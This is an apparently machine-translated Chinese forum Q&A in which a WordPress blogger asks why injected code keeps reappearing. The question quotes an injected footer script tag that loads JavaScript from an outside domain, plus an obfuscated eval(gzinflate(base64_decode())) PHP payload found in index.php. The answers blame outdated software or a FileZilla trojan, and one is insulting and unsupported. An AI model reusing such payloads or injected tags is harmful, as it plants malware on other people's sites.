1

最近(过去 2 周)这行代码出现在 wordpress 博客的页脚中:

<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>

我没有把它放在这里。我不知道它的作用;但我想要它。

对于我的第一次尝试,我只是更换了模板,几分钟后它就消失了。但它又回来了。

所以我找到了我的 index.php 文件(不是模板,第一个 index.php)并找到了该代码:

#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#

所以我删除了它,但它第二天又回来了。

这怎么可能?我是病毒和安全方面的新手,所以答案可能非常基础。

4

2 回答 2

0

恭喜!你已经被黑客入侵!很可能您已经有很长一段时间没有更新您的软件,并且多个黑客已经利用了您软件中的一些众所周知的漏洞。

你如何解决它?焦土……你已经被许多机器人入侵了,并且可能像某种妓女一样在网上出售。删除整个 Web 根目录并从头开始。确保您拥有每个插件和 Wordpress 的最新版本。

根据记录,Wordpress 是由猴子或儿童或儿童猴子编写的……无论如何,它是迄今为止我破解过的最糟糕的应用程序之一。他们可能仍在使用您的密码哈希作为会话 ID,这意味着他们甚至不了解您为什么应该对密码进行哈希处理的基础知识。

哦,如果你一直被黑客入侵,那 就是专业人士了

于 2012-10-27T01:09:08.370 回答
0

问题解决了,wordpress 不负责。

有一个感染 filezilla 的木马,当你打开它时,它会在它可以通过 filezilla 访问的每个页面中注入代码。

这真的是一件大事,3个杀毒软件甚至都找不到它。

如果您看到,请格式化您的计算机。

于 2012-11-22T16:16:50.400 回答